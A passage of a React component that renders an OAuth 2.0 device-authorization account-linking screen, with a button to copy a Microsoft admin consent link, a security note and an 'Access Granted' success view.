                          pointerEvents: adminEmail ? 'auto' : 'none',
                          transition: 'opacity .15s',
                        }}>
                        ✉️ Send Approval Request
                      </a>
                    </div>

                    {/* Copy link fallback */}
                    <div style={{ display: 'flex', alignItems: 'center', gap: 6, marginTop: 6 }}>
                      <div style={{ flex: 1, height: 1, background: 'var(--border, #30363d)' }} />
                      <span style={{ fontSize: 11, color: 'var(--text3, #484f58)' }}>or</span>
                      <div style={{ flex: 1, height: 1, background: 'var(--border, #30363d)' }} />
                    </div>
                    <button
                      onClick={() => {
                        navigator.clipboard.writeText(info.ms_admin_consent_url).catch(() => {});
                        setConsentLinkCopied(true);
                        setTimeout(() => setConsentLinkCopied(false), 2500);
                      }}
                      style={{
                        width: '100%',
                        marginTop: 8,
                        background: 'transparent',
                        border: '1px solid var(--border, #30363d)',
                        borderRadius: 6,
                        padding: '8px 14px',
                        fontSize: 12,
                        color: consentLinkCopied ? '#3fb950' : 'var(--text2, #8b949e)',
                        cursor: 'pointer',
                        transition: 'color .15s',
                      }}>
                      {consentLinkCopied ? '✓ Link copied!' : '🔗 Copy approval link to share manually'}
                    </button>

                    <p style={{ fontSize: 11, color: 'var(--text3, #484f58)', marginTop: 10, lineHeight: 1.5 }}>
                      After your IT admin clicks the link and approves, come back here and try connecting again — it will work immediately.
                    </p>
                  </div>
                )}
              </div>
            )}

            {/* Security note */}
            <div style={{
              marginTop: 16,
              padding: '10px 14px',
              background: 'rgba(63,185,80,0.04)',
              border: '1px solid rgba(63,185,80,0.12)',
              borderRadius: 8,
              fontSize: 11,
              color: 'var(--text3, #484f58)',
              lineHeight: 1.5,
              textAlign: 'center',
            }}>
              🔐 OAuth 2.0 Device Authorization — No passwords are transmitted or stored
            </div>
          </>
        )}

        {/* ── SUCCESS ── */}
        {step === 'success' && (
          <div style={{ textAlign: 'center', padding: '12px 0' }}>
            <div style={{
              width: 72,
              height: 72,
              borderRadius: '50%',
              background: 'rgba(63,185,80,0.1)',
              border: '2px solid rgba(63,185,80,0.3)',
              display: 'flex',
              alignItems: 'center',
              justifyContent: 'center',
              fontSize: 32,
              margin: '0 auto 20px',
            }}>
              ✓
            </div>
            <h2 style={{ fontSize: 22, fontWeight: 700, color: 'var(--success, #3fb950)', marginBottom: 8 }}>
              Access Granted
            </h2>
            <p style={{ fontSize: 14, color: 'var(--text2, #8b949e)', lineHeight: 1.6, marginBottom: 20 }}>
              {successEmail
                ? <><strong style={{ color: 'var(--text, #e6edf3)' }}>{successEmail}</strong> has been linked successfully.</>
                : 'Your account has been linked successfully.'}
            </p>
            <div style={{
              padding: '12px 16px',
              background: 'rgba(63,185,80,0.06)',
              border: '1px solid rgba(63,185,80,0.15)',
              borderRadius: 10,
              fontSize: 13,
              color: 'var(--text3, #484f58)',
            }}>
              You can now close this window. The administrator has been notified.
            </div>
          </div>
        )}

        {/* Footer */}
        <div style={footerStyle}>
          <span>🔒</span>
          <span>Secured by {appName} · OAuth 2.0</span>
        </div>
      </div>
    </div>
  );
}
